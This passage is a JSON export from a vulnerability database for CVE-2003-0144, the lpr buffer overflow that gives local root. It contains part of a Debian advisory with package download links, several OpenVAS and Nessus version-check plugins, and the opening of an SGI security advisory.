826c7c74ca8c6447e9086ad7bc0b4737\n http://security.debian.org/pool/updates/main/l/lpr-ppd/lpr-ppd_0.72.orig.tar.gz\n Size/MD5 checksum: 78323 f2a46147427f20863f98b87cd9a0d772\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr-ppd/lpr-ppd_0.72-2.1_alpha.deb\n Size/MD5 checksum: 114166 9bb33a66dc773c4eb24c4849379f1b5a\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr-ppd/lpr-ppd_0.72-2.1_arm.deb\n Size/MD5 checksum: 91778 a528cadf749c7026d062d36feb5d2cf4\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr-ppd/lpr-ppd_0.72-2.1_i386.deb\n Size/MD5 checksum: 87626 67ae1097288920eac71f5fc8acad5873\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr-ppd/lpr-ppd_0.72-2.1_ia64.deb\n Size/MD5 checksum: 153166 1670dd535d68d6889fd54a5891317a4b\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr-ppd/lpr-ppd_0.72-2.1_hppa.deb\n Size/MD5 checksum: 95258 d444bab8bb8a0f41800f3a1705901058\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr-ppd/lpr-ppd_0.72-2.1_m68k.deb\n Size/MD5 checksum: 84658 a7fe927ebb88ec4724cbc44a57b0fefb\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr-ppd/lpr-ppd_0.72-2.1_mips.deb\n Size/MD5 checksum: 98960 5bdd5ae9f6b7571d892d589e9fada56a\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr-ppd/lpr-ppd_0.72-2.1_mipsel.deb\n Size/MD5 checksum: 98646 c83649d61154a1f10ad75ebb13598231\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr-ppd/lpr-ppd_0.72-2.1_powerpc.deb\n Size/MD5 checksum: 86614 2f5d951e711b7696f911a0df4284fd11\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr-ppd/lpr-ppd_0.72-2.1_s390.deb\n Size/MD5 checksum: 92006 370935ef18bc6eba5c118faf44927177\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr-ppd/lpr-ppd_0.72-2.1_sparc.deb\n Size/MD5 checksum: 110230 2f23d2a685b4a8ca5a9cfb37b08f1f09\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 1, "reporter": "Debian", "published": "2003-04-02T00:00:00", "title": "[SECURITY] [DSA 275-1] New lpr-ppd packages fix local root exploit", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:07", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2003-0144"], "modified": "2003-04-02T00:00:00", "id": "DEBIAN:DSA-275-1:DF095", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00058.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:16", "references": [], "pluginID": "53344", "description": "The remote host is missing an update to lpr-ppd\nannounced via advisory DSA 275-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Debian Security Advisory DSA 275-1 (lpr-ppd)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0144"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53344", "id": "OPENVAS:53344", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_275_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 275-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow has been discovered in lpr, a BSD lpr/lpd line\nprinter spooling system. This problem can be exploited by a local\nuser to gain root privileges, even if the printer system is set up\nproperly.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 0.72-2.1.\n\nThe old stable distribution (potato) does not contain lpr-ppd packages.\n\nFor the stable distribution (sid) this problem has been fixed in\nversion 0.72-3.\n\nWe recommend that you upgrade your lpr-ppd package immediately.\";\ntag_summary = \"The remote host is missing an update to lpr-ppd\nannounced via advisory DSA 275-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20275-1\";\n\nif(description)\n{\n script_id(53344);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:28:10 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(7025);\n script_cve_id(\"CVE-2003-0144\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 275-1 (lpr-ppd)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lpr-ppd\", ver:\"0.72-2.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:11", "references": [], "pluginID": "53358", "description": "The remote host is missing an update to lpr\nannounced via advisory DSA 267-2.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "title": "Debian Security Advisory DSA 267-2 (lpr)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0144"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53358", "id": "OPENVAS:53358", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_267_2.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 267-2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The correction for CVE-2003-0144 for the old stable distribution\n(potato) was a little bit too strict apparently and this update\ncorrects this. For completeness here is the advisory text:\n\nA buffer overflow has been discovered in lpr, a BSD lpr/lpd line\nprinter spooling system. This problem can be exploited by a local\nuser to gain root privileges, even if the printer system is set up\nproperly.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2000.05.07-4.3.\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 0.48-1.2.\n\nFor the stable distribution (sid) this problem has been fixed in\nversion 2000.05.07-4.20.\n\nWe recommend that you upgrade your lpr package immediately.\";\ntag_summary = \"The remote host is missing an update to lpr\nannounced via advisory DSA 267-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20267-2\";\n\nif(description)\n{\n script_id(53358);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:28:10 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(7025);\n script_cve_id(\"CVE-2003-0144\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 267-2 (lpr)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lpr\", ver:\"0.48-1.2\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:23", "references": [], "pluginID": "53338", "description": "The remote host is missing an update to lpr\nannounced via advisory DSA 267-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "title": "Debian Security Advisory DSA 267-1 (lpr)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0144"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53338", "id": "OPENVAS:53338", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_267_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 267-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow has been discovered in lpr, a BSD lpr/lpd line\nprinter spooling system. This problem can be exploited by a local\nuser to gain root privileges, even if the printer system is set up\nproperly.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2000.05.07-4.3.\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 0.48-1.1.\n\nFor the stable distribution (sid) this problem has been fixed in\nversion 2000.05.07-4.20.\n\nWe recommend that you upgrade your lpr package immediately.\";\ntag_summary = \"The remote host is missing an update to lpr\nannounced via advisory DSA 267-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20267-1\";\n\nif(description)\n{\n script_id(53338);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:28:10 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(7025);\n script_cve_id(\"CVE-2003-0144\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 267-1 (lpr)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lpr\", ver:\"0.48-1.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lpr\", ver:\"2000.05.07-4.3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:52:01", "references": ["http://www.debian.org/security/2003/dsa-275"], "pluginID": "15112", "description": "A buffer overflow has been discovered in lpr, a BSD lpr/lpd line printer spooling system. This problem can be exploited by a local user to gain root privileges, even if the printer system is set up properly.", "edition": 5, "reporter": "Tenable", "published": "2004-09-29T00:00:00", "title": "Debian DSA-275-1 : lpr-ppd - buffer overflow", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0144"], "modified": "2018-07-20T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:lpr-ppd"], "id": "DEBIAN_DSA-275.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=15112", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-275. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(15112);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/07/20 2:17:10\");\n\n script_cve_id(\"CVE-2003-0144\");\n script_bugtraq_id(7025);\n script_xref(name:\"DSA\", value:\"275\");\n\n script_name(english:\"Debian DSA-275-1 : lpr-ppd - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow has been discovered in lpr, a BSD lpr/lpd line\nprinter spooling system. This problem can be exploited by a local user\nto gain root privileges, even if the printer system is set up\nproperly.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-275\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the lpr-ppd package immediately.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 0.72-2.1.\n\nThe old stable distribution (potato) does not contain lpr-ppd\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lpr-ppd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"lpr-ppd\", reference:\"0.72-2.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:42:44", "references": [], "pluginID": "61920", "description": "A buffer overflow was discovered in the lpr printer spooling system that can be exploited by a local user to gain root privileges. This can be done even if the printer is configured properly.", "edition": 5, "reporter": "Tenable", "published": "2012-09-06T00:00:00", "title": "Mandrake Linux Security Advisory : lpr (MDKSA-2003:059)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0144"], "modified": "2018-07-19T00:00:00", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:8.2", "p-cpe:/a:mandriva:linux:lpr"], "id": "MANDRAKE_MDKSA-2003-059.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=61920", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:059. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61920);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/19 20:59:12\");\n\n script_cve_id(\"CVE-2003-0144\");\n script_xref(name:\"MDKSA\", value:\"2003:059\");\n\n script_name(english:\"Mandrake Linux Security Advisory : lpr (MDKSA-2003:059)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandrake Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow was discovered in the lpr printer spooling system\nthat can be exploited by a local user to gain root privileges. This\ncan be done even if the printer is configured properly.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected lpr package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lpr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"lpr-0.72-3.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:04:28", "references": ["http://www.debian.org/security/2003/dsa-267"], "pluginID": "15104", "description": "A buffer overflow has been discovered in lpr, a BSD lpr/lpd line printer spooling system. This problem can be exploited by a local user to gain root privileges, even if the printer system is set up properly.", "edition": 5, "reporter": "Tenable", "published": "2004-09-29T00:00:00", "title": "Debian DSA-267-1 : lpr - buffer overflow", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0144"], "modified": "2018-07-20T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:lpr"], "id": "DEBIAN_DSA-267.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=15104", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-267. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(15104);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/07/20 2:17:10\");\n\n script_cve_id(\"CVE-2003-0144\");\n script_bugtraq_id(7025);\n script_xref(name:\"DSA\", value:\"267\");\n\n script_name(english:\"Debian DSA-267-1 : lpr - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow has been discovered in lpr, a BSD lpr/lpd line\nprinter spooling system. This problem can be exploited by a local user\nto gain root privileges, even if the printer system is set up\nproperly.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-267\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the lpr package immediately.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2000.05.07-4.3.\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 0.48-1.1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lpr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"lpr\", reference:\"0.48-1.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"lpr\", reference:\"2000.05.07-4.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:07", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\n______________________________________________________________________________\r\n SGI Security Advisory\r\n\r\nTitle : Multiple Vulnerabilities in BSD LPR Subsystem\r\nNumber : 20030406-02-P\r\nDate : April 25, 2003\r\nReference: CERT VU#39001\r\nReference: CERT VU#30308\r\nReference: CERT VU#293305\r\nReference: CVE CAN-2003-0144\r\nReference: SGI Security Advisory 20030406-01-P\r\nReference: SGI BUGS 864917 865485 873984 874729 880124 883255\r\nFixed in : IRIX 6.5.20 or patch 5071\r\n______________________________________________________________________________\r\n\r\n- --------------\r\n- --- Update ---\r\n- --------------\r\n\r\nThis is an update to SGI Security Bulletin 20030406-01-P. The patch\r\nreferenced in that bulletin (patch 5048) did not contain the fixes for SGI\r\nbug number 880124. SGI support has released a new patch (patch 5071) that\r\ndoes contain all the fixes.\r\n\r\n\r\n- -----------------------\r\n- --- Issue Specifics ---\r\n- -----------------------\r\n\r\nIt's been reported that there are several vulnerabilities in the IRIX bsdlpr\r\nprinting subsystem:\r\n\r\n o lpd chkhost() routine is easily spoofed\r\n See: http://www.kb.cert.org/vuls/id/30308\r\n\r\n o lpd should execl() sendmail -t, not sendmail\r\n See: http://www.kb.cert.org/vuls/id/39001\r\n\r\n o Unstable behavior in lpd resulting from the patch4835 fixes\r\n\r\n o lprm buffer overrun\r\n See: http://www.insecure.org/sploits/lprm.overflow.html\r\n http://www.kb.cert.org/vuls/id/293305\r\n\r\nSGI has investigated the issue and recommends the following steps for\r\nneutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be\r\nimplemented on ALL vulnerable SGI systems.\r\n\r\nThese issues have been corrected with patches and in future releases of IRIX.\r\n\r\n\r\n- --------------\r\n- --- Impact ---\r\n- --------------\r\n\r\nThe bsdlpr subsystem is not installed 